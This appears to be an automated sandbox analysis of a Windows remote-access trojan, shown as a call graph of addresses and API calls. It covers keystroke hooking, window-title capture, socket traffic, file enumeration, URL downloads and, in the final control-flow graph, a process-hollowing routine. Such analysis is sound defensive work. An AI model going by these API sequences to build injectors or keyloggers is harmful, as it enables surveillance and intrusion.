110502->110506 110507 123349b2 110503->110507 110604 1234e711 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 110504->110604 110505->110460 110508 123349e2 110506->110508 110509 1234b4ef 79 API calls 110507->110509 110511 12332093 28 API calls 110508->110511 110512 123349b7 110509->110512 110513 123349f1 110511->110513 110606 123510b2 51 API calls 110512->110606 110515 1234b4ef 79 API calls 110513->110515 110516 123349f6 110515->110516 110516->110505 110610 1234b7b6 GlobalMemoryStatusEx 110517->110610 110519 1234b7f5 110519->109675 110611 12344580 110520->110611 110524 1233dda5 110523->110524 110525 123434ff 3 API calls 110524->110525 110526 1233ddac 110525->110526 110527 12343549 3 API calls 110526->110527 110528 1233ddc4 110526->110528 110527->110528 110528->109675 110530 123320b7 28 API calls 110529->110530 110531 1234bc57 110530->110531 110531->109675 110532->109675 110534 12366e90 ___scrt_get_show_window_mode 110533->110534 110535 1234bab5 GetForegroundWindow GetWindowTextW 110534->110535 110536 1233417e 28 API calls 110535->110536 110537 1234badf 110536->110537 110537->109675 110539 12332093 28 API calls 110538->110539 110540 1233f8f6 110539->110540 110540->109675 110542 123320df 11 API calls 110541->110542 110543 12332f3d 110542->110543 110544 123332a0 28 API calls 110543->110544 110545 12332f59 110544->110545 110545->109675 110547 12334ab4 110546->110547 110641 1233520c 110547->110641 110549 12334ac9 _Yarn 110550 12334b40 WaitForSingleObject 110549->110550 110551 12334b20 110549->110551 110552 12334b56 110550->110552 110553 12334b32 send 110551->110553 110647 1235103a 53 API calls 110552->110647 110555 12334b7b 110553->110555 110557 12331fd8 11 API calls 110555->110557 110556 12334b69 SetEvent 110556->110555 110558 12334b83 110557->110558 110559 12331fd8 11 API calls 110558->110559 110560 12334b8b 110559->110560 110560->109675 110562 123320df 11 API calls 110561->110562 110563 12334c27 110562->110563 110564 123320df 11 API calls 110563->110564 110566 12334c30 110564->110566 110565 1236bd51 _Yarn 21 API calls 110565->110566 110566->110565 110568 123320b7 28 API calls 110566->110568 110569 12334ca1 110566->110569 110570 12331fe2 28 API calls 110566->110570 110573 12331fd8 11 API calls 110566->110573 110665 12334b96 110566->110665 110671 12334cc3 110566->110671 110568->110566 110571 12334e26 98 API calls 110569->110571 110570->110566 110572 12334ca8 110571->110572 110574 12331fd8 11 API calls 110572->110574 110573->110566 110575 12334cb1 110574->110575 110576 12331fd8 11 API calls 110575->110576 110577 12334cba 110576->110577 110577->109675 110579->109675 110580->109675 110582->109675 110584 12334e40 SetEvent FindCloseChangeNotification 110583->110584 110585 12334e57 closesocket 110583->110585 110586 12334ed8 110584->110586 110587 12334e64 110585->110587 110586->109675 110588 12334e7a 110587->110588 111080 123350e4 83 API calls 110587->111080 110590 12334ece SetEvent CloseHandle 110588->110590 110591 12334e8c WaitForSingleObject 110588->110591 110590->110586 111081 1234e711 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 110591->111081 110593 12334e9b SetEvent WaitForSingleObject 111082 1234e711 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 110593->111082 110595 12334eb3 SetEvent CloseHandle CloseHandle 110595->110590 110596->110434 110597->110441 110602 1233515c 101 API calls 110599->110602 110601 12335159 110602->110601 110603->110467 110604->110460 110605->110490 110606->110504 110607->110502 110608->110472 110610->110519 110614 12344553 110611->110614 110615 12344568 ___scrt_initialize_default_local_stdio_options 110614->110615 110618 1236f79d 110615->110618 110621 1236c4f0 110618->110621 110622 1236c530 110621->110622 110623 1236c518 110621->110623 110622->110623 110625 1236c538 110622->110625 110636 123705dd 20 API calls __dosmaperr 110623->110636 110637 1236a7b7 35 API calls 2 library calls 110625->110637 110627 1236c548 110638 1236cc76 20 API calls 2 library calls 110627->110638 110628 12364fcb ___crtLCMapStringA 5 API calls 110631 12344576 110628->110631 110630 1236c5c0 110639 1236d2e4 50 API calls 3 library calls 110630->110639 110631->109675 110634 1236c51d __cftof 110634->110628 110635 1236c5cb 110640 1236cce0 20 API calls _free 110635->110640 110636->110634 110637->110627 110638->110630 110639->110635 110640->110634 110642 12335214 110641->110642 110643 123323ce 11 API calls 110642->110643 110644 1233521f 110643->110644 110648 12335234 110644->110648 110646 1233522e 110646->110549 110647->110556 110649 12335240 110648->110649 110650 1233526e 110648->110650 110652 123328e8 28 API calls 110649->110652 110664 123328a4 22 API calls 110650->110664 110654 1233524a 110652->110654 110654->110646 110666 12334ba0 WaitForSingleObject 110665->110666 110667 12334bcd recv 110665->110667 110684 12351076 53 API calls 110666->110684 110669 12334be0 110667->110669 110669->110566 110670 12334bbc SetEvent 110670->110669 110672 123320df 11 API calls 110671->110672 110681 12334cde 110672->110681 110673 12334e13 110674 12331fd8 11 API calls 110673->110674 110675 12334e1c 110674->110675 110675->110566 110676 123341a2 28 API calls 110676->110681 110677 12331fe2 28 API calls 110677->110681 110678 123320f6 28 API calls 110678->110681 110679 12331fc0 28 API calls 110680 12334dad CreateEventA CreateThread WaitForSingleObject FindCloseChangeNotification 110679->110680 110680->110681 110998 12345aea 110680->110998 110681->110673 110681->110676 110681->110677 110681->110678 110681->110679 110682 12331fd8 11 API calls 110681->110682 110685 1234299f 110681->110685 110682->110681 110684->110670 110686 123429b1 110685->110686 110687 123341a2 28 API calls 110686->110687 110688 123429c4 110687->110688 110689 123320f6 28 API calls 110688->110689 110690 123429d3 110689->110690 110691 123320f6 28 API calls 110690->110691 110692 123429e2 110691->110692 110693 1234be1b 28 API calls 110692->110693 110694 123429eb 110693->110694 110695 12342a93 110694->110695 110697 12331e65 22 API calls 110694->110697 110696 12331e8d 11 API calls 110695->110696 110698 12342a9c 110696->110698 110699 12342a02 110697->110699 110700 12331fd8 11 API calls 110698->110700 110701 123320f6 28 API calls 110699->110701 110702 12342aa5 110700->110702 110703 12342a0d 110701->110703 110704 12331fd8 11 API calls 110702->110704 110705 12331e65 22 API calls 110703->110705 110706 12342aad 110704->110706 110707 12342a18 110705->110707 110706->110681 110708 123320f6 28 API calls 110707->110708 110709 12342a23 110708->110709 110710 12331e65 22 API calls 110709->110710 110711 12342a2e 110710->110711 110712 123320f6 28 API calls 110711->110712 110713 12342a39 110712->110713 110714 12331e65 22 API calls 110713->110714 110715 12342a44 110714->110715 110716 123320f6 28 API calls 110715->110716 110717 12342a4f 110716->110717 110718 12331e65 22 API calls 110717->110718 110719 12342a5a 110718->110719 110720 123320f6 28 API calls 110719->110720 110721 12342a65 110720->110721 110722 12331e65 22 API calls 110721->110722 110723 12342a73 110722->110723 110724 123320f6 28 API calls 110723->110724 110725 12342a7e 110724->110725 110729 12342ab4 GetModuleFileNameW 110725->110729 110728 12334e26 98 API calls 110728->110695 110730 123320df 11 API calls 110729->110730 110731 12342adf 110730->110731 110732 123320df 11 API calls 110731->110732 110733 12342aeb 110732->110733 110734 123320df 11 API calls 110733->110734 110757 12342af7 110734->110757 110735 1233d9e8 32 API calls 110735->110757 110736 12331fd8 11 API calls 110736->110757 110737 1234b978 42 API calls 110737->110757 110738 12348568 31 API calls 110738->110757 110739 12342c1d Sleep 110739->110757 110740 1233417e 28 API calls 110740->110757 110741 123342fc 78 API calls 110741->110757 110742 1233431d 28 API calls 110742->110757 110743 12333014 28 API calls 110743->110757 110744 12331f09 11 API calls 110744->110757 110745 12342cbf Sleep 110745->110757 110746 12342d61 Sleep 110746->110757 110747 12342dc4 DeleteFileW 110747->110757 110748 12342dfb DeleteFileW 110748->110757 110749 1234c485 32 API calls 110749->110757 110750 12342e4d Sleep 110750->110757 110751 12342e37 DeleteFileW 110751->110757 110752 12342ec6 110753 12331f09 11 API calls 110752->110753 110754 12342ed2 110753->110754 110755 12331f09 11 API calls 110754->110755 110756 12342ede 110755->110756 110758 12331f09 11 API calls 110756->110758 110757->110735 110757->110736 110757->110737 110757->110738 110757->110739 110757->110740 110757->110741 110757->110742 110757->110743 110757->110744 110757->110745 110757->110746 110757->110747 110757->110748 110757->110749 110757->110750 110757->110751 110757->110752 110760 12342e92 Sleep 110757->110760 110759 12342eea 110758->110759 110761 1233b904 28 API calls 110759->110761 110762 12331f09 11 API calls 110760->110762 110763 12342efd 110761->110763 110766 12342ea2 110762->110766 110765 123320f6 28 API calls 110763->110765 110764 12331f09 11 API calls 110764->110766 110767 12342f1d 110765->110767 110766->110757 110766->110764 110769 12342ec4 110766->110769 110876 1234322d 110767->110876 110769->110759 110771 12331f09 11 API calls 110772 12342f34 110771->110772 110773 12342f54 110772->110773 110774 123430a8 110772->110774 110775 1234bd1e 28 API calls 110773->110775 110888 1234bd1e 110774->110888 110778 12342f60 110775->110778 110779 1234bb8e 28 API calls 110778->110779 110782 12342f7a 110779->110782 110780 12332f31 28 API calls 110781 123430e8 110780->110781 110784 12332f10 28 API calls 110781->110784 110783 12332f31 28 API calls 110782->110783 110786 12342faa 110783->110786 110785 123430f7 110784->110785 110788 12332f10 28 API calls 110785->110788 110787 12332f10 28 API calls 110786->110787 110790 12342fb9 110787->110790 110789 12343103 110788->110789 110792 12332f10 28 API calls 110789->110792 110791 12332f10 28 API calls 110790->110791 110793 12342fc8 110791->110793 110794 12343112 110792->110794 110795 12332f10 28 API calls 110793->110795 110796 12332f10 28 API calls 110794->110796 110798 12342fd7 110795->110798 110797 12343121 110796->110797 110800 12332f10 28 API calls 110797->110800 110799 12332f10 28 API calls 110798->110799 110802 12342fe6 110799->110802 110801 12343130 110800->110801 110804 12332f10 28 API calls 110801->110804 110803 12332f10 28 API calls 110802->110803 110806 12342ff2 110803->110806 110805 1234313f 110804->110805 110892 12332ea1 110805->110892 110807 12332f10 28 API calls 110806->110807 110810 12342ffe 110807->110810 110811 12332ea1 28 API calls 110810->110811 110814 1234300d 110811->110814 110812 12334aa1 60 API calls 110813 12343156 110812->110813 110816 12331fd8 11 API calls 110813->110816 110815 12332f10 28 API calls 110814->110815 110818 12343019 110815->110818 110817 12343162 110816->110817 110820 12331fd8 11 API calls 110817->110820 110819 12332ea1 28 API calls 110818->110819 110822 12343023 110819->110822 110821 1234316e 110820->110821 110824 12331fd8 11 API calls 110821->110824 110823 12334aa1 60 API calls 110822->110823 110825 12343030 110823->110825 110826 1234317a 110824->110826 110827 12331fd8 11 API calls 110825->110827 110828 12331fd8 11 API calls 110826->110828 110830 12343039 110827->110830 110829 12343186 110828->110829 110832 12331fd8 11 API calls 110829->110832 110831 12331fd8 11 API calls 110830->110831 110834 12343042 110831->110834 110833 1234318f 110832->110833 110836 12331fd8 11 API calls 110833->110836 110835 12331fd8 11 API calls 110834->110835 110838 1234304b 110835->110838 110837 12343198 110836->110837 110840 12331fd8 11 API calls 110837->110840 110839 12331fd8 11 API calls 110838->110839 110842 12343054 110839->110842 110841 1234309c 110840->110841 110844 12331fd8 11 API calls 110841->110844 110843 12331fd8 11 API calls 110842->110843 110845 12343060 110843->110845 110847 123431aa 110844->110847 110846 12331fd8 11 API calls 110845->110846 110849 1234306c 110846->110849 110848 12331f09 11 API calls 110847->110848 110851 123431b6 110848->110851 110850 12331fd8 11 API calls 110849->110850 110853 12343078 110850->110853 110852 12331fd8 11 API calls 110851->110852 110855 123431c2 110852->110855 110854 12331fd8 11 API calls 110853->110854 110856 12343084 110854->110856 110857 12331fd8 11 API calls 110855->110857 110858 12331fd8 11 API calls 110856->110858 110859 123431ce 110857->110859 110861 12343090 110858->110861 110860 12331fd8 11 API calls 110859->110860 110863 123431da 110860->110863 110862 12331fd8 11 API calls 110861->110862 110862->110841 110864 12331fd8 11 API calls 110863->110864 110865 123431e6 110864->110865 110866 12331fd8 11 API calls 110865->110866 110867 123431f2 110866->110867 110868 12331fd8 11 API calls 110867->110868 110869 123431fe 110868->110869 110870 12331fd8 11 API calls 110869->110870 110871 1234320a 110870->110871 110872 12331fd8 11 API calls 110871->110872 110873 12343216 110872->110873 110874 12331fd8 11 API calls 110873->110874 110875 12342a83 110874->110875 110875->110728 110878 1234323c 110876->110878 110886 1234326b 110876->110886 110877 1234327a 110879 1233417e 28 API calls 110877->110879 110905 12341cf2 110878->110905 110880 12343286 110879->110880 110882 12331fd8 11 API calls 110880->110882 110884 12342f28 110882->110884 110884->110771 110886->110877 110901 14641c5b 110886->110901 110889 1234bd2b 110888->110889 110890 123320b7 28 API calls 110889->110890 110891 123430b1 110890->110891 110891->110780 110898 12332eb0 110892->110898 110893 12332ef2 110894 12331fb0 28 API calls 110893->110894 110895 12332ef0 110894->110895 110896 12332055 11 API calls 110895->110896 110897 12332f09 110896->110897 110897->110812 110898->110893 110899 12332ee7 110898->110899 110997 12333365 28 API calls 110899->110997 110902 14641c6b ___scrt_fastfail 110901->110902 110909 146412ee 110902->110909 110904 14641c87 110904->110877 110948 12341cfe 110905->110948 110908 12341f67 22 API calls _Yarn 110908->110886 110910 14641324 ___scrt_fastfail 110909->110910 110911 146413b7 GetEnvironmentVariableW 110910->110911 110935 146410f1 110911->110935 110914 146410f1 57 API calls 110915 14641465 110914->110915 110916 146410f1 57 API calls 110915->110916 110917 14641479 110916->110917 110918 146410f1 57 API calls 110917->110918 110919 1464148d 110918->110919 110920 146410f1 57 API calls 110919->110920 110921 146414a1 110920->110921 110922 146410f1 57 API calls 110921->110922 110923 146414b5 lstrlenW 110922->110923 110924 146414d2 110923->110924 110925 146414d9 lstrlenW 110923->110925 110924->110904 110926 146410f1 57 API calls 110925->110926 110927 14641501 lstrlenW lstrcatW 110926->110927 110928 146410f1 57 API calls 110927->110928 110929 14641539 lstrlenW lstrcatW 110928->110929 110930 146410f1 57 API calls 110929->110930 110931 1464156b lstrlenW lstrcatW 110930->110931 110932 146410f1 57 API calls 110931->110932 110933 1464159d lstrlenW lstrcatW 110932->110933 110934 146410f1 57 API calls 110933->110934 110934->110924 110936 14641118 ___scrt_fastfail 110935->110936 110937 14641129 lstrlenW 110936->110937 110938 14642c40 ___scrt_fastfail 110937->110938 110939 14641148 lstrcatW lstrlenW 110938->110939 110940 14641177 lstrlenW FindFirstFileW 110939->110940 110941 14641168 lstrlenW 110939->110941 110942 146411a0 110940->110942 110943 146411e1 110940->110943 110941->110940 110944 146411c7 FindNextFileW 110942->110944 110945 146411aa 110942->110945 110943->110914 110944->110942 110946 146411da FindClose 110944->110946 110945->110944 110947 14641000 49 API calls 110945->110947 110946->110943 110947->110945 110981 1234179c 110948->110981 110950 12341d1c 110951 12341d32 SetLastError 110950->110951 110952 1234179c SetLastError 110950->110952 110978 12341cfa 110950->110978 110951->110978 110953 12341d4f 110952->110953 110953->110951 110955 12341d71 GetNativeSystemInfo 110953->110955 110953->110978 110956 12341db7 110955->110956 110968 12341dc4 SetLastError 110956->110968 110984 12341ca3 VirtualAlloc 110956->110984 110959 12341de7 110960 12341e0c GetProcessHeap HeapAlloc 110959->110960 110994 12341ca3 VirtualAlloc 110959->110994 110962 12341e35 110960->110962 110963 12341e23 110960->110963 110964 1234179c SetLastError 110962->110964 110995 12341cba VirtualFree 110963->110995 110967 12341e7e 110964->110967 110965 12341dff 110965->110960 110965->110968 110969 12341f30 110967->110969 110985 12341ca3 VirtualAlloc 110967->110985 110968->110978 110996 12342077 GetProcessHeap HeapFree 110969->110996 110972 12341e97 _Yarn 110986 123417af SetLastError _Yarn ___scrt_get_show_window_mode 110972->110986 110974 12341ec3 110974->110969 110987 12341b5f 26 API calls 110974->110987 110976 12341ef0 110976->110969 110988 1234194f 110976->110988 110978->110908 110979 12341efb 110979->110969 110979->110978 110980 12341f25 SetLastError 110979->110980 110980->110969 110982 123417a0 SetLastError 110981->110982 110983 123417ab 110981->110983 110982->110950 110983->110950 110984->110959 110985->110972 110986->110974 110987->110976 110992 12341975 110988->110992 110989 12341a5e 110990 123418b2 VirtualProtect 110989->110990 110991 12341a70 110990->110991 110991->110979 110992->110989 110992->110991 110993 123418b2 VirtualProtect 110992->110993 110993->110992 110994->110965 110995->110968 110996->110978 110997->110895 110999 123320f6 28 API calls 110998->110999 111000 12345b0c SetEvent 110999->111000 111001 12345b21 111000->111001 111002 123341a2 28 API calls 111001->111002 111003 12345b3b 111002->111003 111004 123320f6 28 API calls 111003->111004 111005 12345b4b 111004->111005 111006 123320f6 28 API calls 111005->111006 111007 12345b5d 111006->111007 111008 1234be1b 28 API calls 111007->111008 111009 12345b66 111008->111009 111010 12345b86 GetTickCount 111009->111010 111074 12345cf9 111009->111074 111076 12345cd6 111009->111076 111012 1234bb8e 28 API calls 111010->111012 111011 12331e8d 11 API calls 111013 12347092 111011->111013 111014 12345b97 111012->111014 111016 12331fd8 11 API calls 111013->111016 111077 1234bae6 GetLastInputInfo GetTickCount 111014->111077 111018 1234709e 111016->111018 111020 12331fd8 11 API calls 111018->111020 111019 12345ba3 111021 1234bb8e 28 API calls 111019->111021 111022 123470aa 111020->111022 111023 12345bae 111021->111023 111024 1234ba96 30 API calls 111023->111024 111025 12345bbc 111024->111025 111026 1234bd1e 28 API calls 111025->111026 111027 12345bca 111026->111027 111028 12331e65 22 API calls 111027->111028 111029 12345bd8 111028->111029 111030 12332f31 28 API calls 111029->111030 111031 12345be6 111030->111031 111032 12332ea1 28 API calls 111031->111032 111033 12345bf5 111032->111033 111034 12332f10 28 API calls 111033->111034 111035 12345c04 111034->111035 111036 12332ea1 28 API calls 111035->111036 111037 12345c13 111036->111037 111038 12332f10 28 API calls 111037->111038 111039 12345c1f 111038->111039 111040 12332ea1 28 API calls 111039->111040 111041 12345c29 111040->111041 111042 12334aa1 60 API calls 111041->111042 111043 12345c38 111042->111043 111044 12331fd8 11 API calls 111043->111044 111045 12345c41 111044->111045 111046 12331fd8 11 API calls 111045->111046 111047 12345c4d 111046->111047 111048 12331fd8 11 API calls 111047->111048 111049 12345c59 111048->111049 111050 12331fd8 11 API calls 111049->111050 111051 12345c65 111050->111051 111052 12331fd8 11 API calls 111051->111052 111053 12345c71 111052->111053 111054 12331fd8 11 API calls 111053->111054 111055 12345c7d 111054->111055 111056 12331f09 11 API calls 111055->111056 111057 12345c86 111056->111057 111058 12331fd8 11 API calls 111057->111058 111059 12345c8f 111058->111059 111060 12331fd8 11 API calls 111059->111060 111061 12345c98 111060->111061 111062 12331e65 22 API calls 111061->111062 111063 12345ca3 111062->111063 111064 1236baac _strftime 39 API calls 111063->111064 111065 12345cb0 111064->111065 111066 12345cdb 111065->111066 111067 12345cb5 111065->111067 111068 12331e65 22 API calls 111066->111068 111070 12345cc3 111067->111070 111071 12345cce 111067->111071 111069 12345ce5 111068->111069 111069->111074 111069->111076 111078 12334ff4 81 API calls 111070->111078 111073 12334f51 104 API calls 111071->111073 111073->111076 111079 123350e4 83 API calls 111074->111079 111075 12345cc9 111075->111076 111076->111011 111077->111019 111078->111075 111079->111075 111080->110588 111081->110593 111082->110595 111085 1233ddd9 111084->111085 111086 12332252 11 API calls 111085->111086 111087 1233dde4 111086->111087 111088 123341d9 28 API calls 111087->111088 111089 1233dbd0 111088->111089 111090 12332fa5 111089->111090 111091 12332fb4 111090->111091 111092 12332ff6 111091->111092 111097 12332feb 111091->111097 111101 1233323f 111092->111101 111094 12332ff4 111095 12333262 11 API calls 111094->111095 111096 1233300d 111095->111096 111096->109761 111100 12333211 28 API calls 111097->111100 111099->109738 111100->111094 111102 123336a6 28 API calls 111101->111102 111103 1233324c 111102->111103 111103->111094 111104->109795 111109 1233f7c2 111107->111109 111108 12343549 3 API calls 111108->111109 111109->111108 111110 1233f866 111109->111110 111112 1233f856 Sleep 111109->111112 111129 1233f7f4 111109->111129 111113 1233905c 28 API calls 111110->111113 111111 1233905c 28 API calls 111111->111129 111112->111109 111116 1233f871 111113->111116 111115 1234bc5e 28 API calls 111115->111129 111117 1234bc5e 28 API calls 111116->111117 111118 1233f87d 111117->111118 111142 12343814 14 API calls 111118->111142 111121 12331f09 11 API calls 111121->111129 111122 1233f890 111123 12331f09 11 API calls 111122->111123 111125 1233f89c 111123->111125 111124 12332093 28 API calls 111124->111129 111126 12332093 28 API calls 111125->111126 111127 1233f8ad 111126->111127 111130 1234376f 14 API calls 111127->111130 111128 1234376f 14 API calls 111128->111129 111129->111111 111129->111112 111129->111115 111129->111121 111129->111124 111129->111128 111140 1233d096 111 API calls ___scrt_get_show_window_mode 111129->111140 111141 12343814 14 API calls 111129->111141 111131 1233f8c0 111130->111131 111143 12342850 TerminateProcess WaitForSingleObject 111131->111143 111133 1233f8c8 ExitProcess 111144 123427ee 61 API calls 111138->111144 111141->111129 111142->111122 111143->111133 111145 591118 111148 59113f 111145->111148 111149 591171 111148->111149 111150 59129c VirtualAlloc 111149->111150 111157 59112e 111149->111157 111151 5912cc VirtualAlloc 111150->111151 111152 5912df GetPEB 111150->111152 111151->111152 111151->111157 111154 5913a8 111152->111154 111155 591460 GetPEB 111154->111155 111156 591411 LoadLibraryA 111154->111156 111155->111157 111156->111154 111156->111157 111158 12345d06 111173 1234b380 111158->111173 111160 12345d0f 111161 123320f6 28 API calls 111160->111161 111162 12345d1e 111161->111162 111163 12334aa1 60 API calls 111162->111163 111164 12345d2a 111163->111164 111165 12347089 111164->111165 111166 12331fd8 11 API calls 111164->111166 111167 12331e8d 11 API calls 111165->111167 111166->111165 111168 12347092 111167->111168 111169 12331fd8 11 API calls 111168->111169 111170 1234709e 111169->111170 111171 12331fd8 11 API calls 111170->111171 111172 123470aa 111171->111172 111174 123320df 11 API calls 111173->111174 111175 1234b38e 111174->111175 111176 1236bd51 _Yarn 21 API calls 111175->111176 111177 1234b39e InternetOpenW InternetOpenUrlW 111176->111177 111178 1234b3c5 InternetReadFile 111177->111178 111182 1234b3e8 111178->111182 111179 1234b415 InternetCloseHandle InternetCloseHandle 111181 1234b427 111179->111181 111180 123320b7 28 API calls 111180->111182 111181->111160 111182->111178 111182->111179 111182->111180 111183 12331fd8 11 API calls 111182->111183 111183->111182 111184 1464c7a7 111185 1464c7be 111184->111185 111190 1464c82c 111184->111190 111185->111190 111196 1464c7e6 GetModuleHandleA 111185->111196 111187 1464c835 GetModuleHandleA 111189 1464c83f 111187->111189 111188 1464c872 111189->111189 111189->111190 111191 1464c85f GetProcAddress 111189->111191 111190->111187 111190->111188 111190->111189 111191->111190 111192 1464c7dd 111192->111189 111192->111190 111193 1464c800 GetProcAddress 111192->111193 111193->111190 111194 1464c80d VirtualProtect 111193->111194 111194->111190 111195 1464c81c VirtualProtect 111194->111195 111195->111190 111197 1464c7ef 111196->111197 111205 1464c82c 111196->111205 111208 1464c803 GetProcAddress 111197->111208 111199 1464c835 GetModuleHandleA 111204 1464c83f 111199->111204 111200 1464c872 111201 1464c7f4 111202 1464c800 GetProcAddress 111201->111202 111201->111205 111203 1464c80d VirtualProtect 111202->111203 111202->111205 111203->111205 111206 1464c81c VirtualProtect 111203->111206 111204->111205 111207 1464c85f GetProcAddress 111204->111207 111205->111199 111205->111200 111205->111204 111206->111205 111207->111205 111209 1464c82c 111208->111209 111210 1464c80d VirtualProtect 111208->111210 111212 1464c835 GetModuleHandleA 111209->111212 111213 1464c872 111209->111213 111210->111209 111211 1464c81c VirtualProtect 111210->111211 111211->111209 111215 1464c83f 111212->111215 111214 1464c85f GetProcAddress 111214->111215 111215->111209 111215->111214 111216 123465a0 111217 12331e65 22 API calls 111216->111217 111218 123465b0 111217->111218 111219 123320f6 28 API calls 111218->111219 111220 123465bb 111219->111220 111221 12331e65 22 API calls 111220->111221 111222 123465c6 111221->111222 111223 123320f6 28 API calls 111222->111223 111224 123465d1 111223->111224 111227 1234292a 111224->111227 111228 1233482d 3 API calls 111227->111228 111229 1234293e 111228->111229 111230 123348c8 96 API calls 111229->111230 111231 12342946 111230->111231 111232 12332f31 28 API calls 111231->111232 111233 1234295f 111232->111233 111234 12332f10 28 API calls 111233->111234 111235 12342969 111234->111235 111236 12334aa1 60 API calls 111235->111236 111237 12342973 111236->111237 111238 12331fd8 11 API calls 111237->111238 111239 1234297b 111238->111239 111240 12334c10 264 API calls 111239->111240 111241 12342989 111240->111241 111242 12331fd8 11 API calls 111241->111242 111243 12342991 111242->111243 111244 12331fd8 11 API calls 111243->111244 111245 12342999 111244->111245 111246 1233a2a4 111249 1233a367 111246->111249 111248 1233a2b5 111250 1233a3c7 CallNextHookEx 111249->111250 111251 1233a384 111249->111251 111250->111248 111252 1233a3b0 111251->111252 111253 1233a38f 111251->111253 111262 1233b221 111252->111262 111254 1233a3a2 111253->111254 111255 1233a394 111253->111255 111320 1233b6a0 30 API calls 111254->111320 111255->111250 111319 1233b646 38 API calls 111255->111319 111260 1233a3a0 111260->111250 111263 1233b230 111262->111263 111264 12332093 28 API calls 111263->111264 111265 1233a3bc 111263->111265 111266 1233b4bd 111264->111266 111265->111250 111268 1233b4ed 111265->111268 111321 1233a611 29 API calls 111266->111321 111269 1233b630 111268->111269 111270 1233b507 111268->111270 111322 1233a3e0 111269->111322 111271 1233b58b 111270->111271 111274 1233b50d 111270->111274 111276 12332093 28 API calls 111271->111276 111273 1233b62e 111273->111250 111274->111273 111280 12332093 28 API calls 111274->111280 111277 1233b599 111276->111277 111279 12332093 28 API calls 111277->111279 111281 1233b5a7 111279->111281 111282 1233b535 111280->111282 111284 1234bc5e 28 API calls 111281->111284 111332 1236fcc6 43 API calls 111282->111332 111286 1233b5b7 111284->111286 111285 1233b543 111287 12332093 28 API calls 111285->111287 111335 1233b70e 31 API calls 111286->111335 111289 1233b553 111287->111289 111333 1233919d 28 API calls 111289->111333 111290 1233b5ca 111292 1234bc5e 28 API calls 111290->111292 111294 1233b5d8 111292->111294 111293 1233b55e 111295 12332ea1 28 API calls 111293->111295 111296 12332fa5 28 API calls 111294->111296 111297 1233b568 111295->111297 111298 1233b5e3 111296->111298 111334 1233a611 29 API calls 111297->111334 111300 12332fa5 28 API calls 111298->111300 111302 1233b5ed 111300->111302 111301 1233b570 111303 12331fd8 11 API calls 111301->111303 111336 1233a636 29 API calls 111302->111336 111305 1233b579 111303->111305 111307 12331fd8 11 API calls 111305->111307 111306 1233b5f5 111308 12331f09 11 API calls 111306->111308 111310 1233b582 111307->111310 111309 1233b5fe 111308->111309 111311 12331f09 11 API calls 111309->111311 111313 12331fd8 11 API calls 111310->111313 111312 1233b607 111311->111312 111314 12331f09 11 API calls 111312->111314 111313->111273 111315 1233b610 111314->111315 111316 12331f09 11 API calls 111315->111316 111317 1233b61c 111316->111317 111318 12331fd8 11 API calls 111317->111318 111318->111310 111319->111260 111320->111260 111321->111265 111323 12366e90 ___scrt_get_show_window_mode 111322->111323 111324 1233a401 6 API calls 111323->111324 111325 1233a4d6 111324->111325 111326 1233a468 ___scrt_get_show_window_mode 111324->111326 111327 1233a4e6 ToUnicodeEx 111325->111327 111328 1233a4cd 111326->111328 111330 1233a4a4 ToUnicodeEx 111326->111330 111327->111327 111327->111328 111329 1233417e 28 API calls 111328->111329 111331 1233a515 111329->111331 111330->111328 111337 1233a636 29 API calls 111331->111337 111332->111285 111333->111293 111334->111301 111335->111290 111336->111306 111337->111273 111338 1233165e 111339 12331666 111338->111339 111340 12331669 111338->111340 111341 123316a8 111340->111341 111343 12331696 111340->111343 111342 123644ea new 22 API calls 111341->111342 111345 1233169c 111342->111345 111344 123644ea new 22 API calls 111343->111344 111344->111345 111346 1236be58 111348 1236be64 _swprintf CallCatchBlock 111346->111348 111347 1236be72 111362 123705dd 20 API calls __dosmaperr 111347->111362 111348->111347 111350 1236be9c 111348->111350 111357 12375888 EnterCriticalSection 111350->111357 111352 1236be77 __cftof CallCatchBlock 111353 1236bea7 111358 1236bf48 111353->111358 111357->111353 111360 1236bf56 111358->111360 111359 1236beb2 111363 1236becf LeaveCriticalSection std::_Lockit::~_Lockit 111359->111363 111360->111359 111364 1237976c 36 API calls 2 library calls 111360->111364 111362->111352 111363->111352 111364->111360

                                                                                                                                                                                          Executed Functions

                                                                                                                                                                                          Function 123480EF Relevance: 59.8, APIs: 29, Strings: 5, Instructions: 289nativelibraryloaderCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 5 123480ef-12348118 6 1234811c-12348183 GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress 5->6 7 12348480 6->7 8 12348189-12348190 6->8 9 12348482-1234848c 7->9 8->7 10 12348196-1234819d 8->10 10->7 11 123481a3-123481a5 10->11 11->7 12 123481ab-123481d8 call 12366e90 * 2 11->12 12->7 17 123481de-123481e9 12->17 17->7 18 123481ef-1234821f CreateProcessW 17->18 19 12348225-1234824d VirtualAlloc Wow64GetThreadContext 18->19 20 1234847a GetLastError 18->20 21 12348444-12348478 VirtualFree GetCurrentProcess NtUnmapViewOfSection NtClose TerminateProcess 19->21 22 12348253-12348273 ReadProcessMemory 19->22 20->7 21->7 22->21 23 12348279-1234829b NtCreateSection 22->23 23->21 24 123482a1-123482ae 23->24 25 123482b0-123482bb NtUnmapViewOfSection 24->25 26 123482c1-123482e3 NtMapViewOfSection 24->26 25->26 27 123482e5-12348322 VirtualFree NtClose TerminateProcess 26->27 28 1234832d-12348354 GetCurrentProcess NtMapViewOfSection 26->28 27->6 29 12348328 27->29 28->21 30 1234835a-1234835e 28->30 29->7 31 12348367-12348385 call 12366910 30->31 32 12348360-12348364 30->32 35 123483c7-123483d0 31->35 36 12348387-12348395 31->36 32->31 38 123483f0-123483f4 35->38 39 123483d2-123483d8 35->39 37 12348397-123483ba call 12366910 36->37 49 123483bc-123483c3 37->49 42 123483f6-12348413 WriteProcessMemory 38->42 43 12348419-12348430 Wow64SetThreadContext 38->43 39->38 41 123483da-123483ed call 12348503 39->41 41->38 42->21 44 12348415 42->44 43->21 45 12348432-1234843e ResumeThread 43->45 44->43 45->21 48 12348440-12348442 45->48 48->9 49->35
                                                                                                                                                                                          APIs
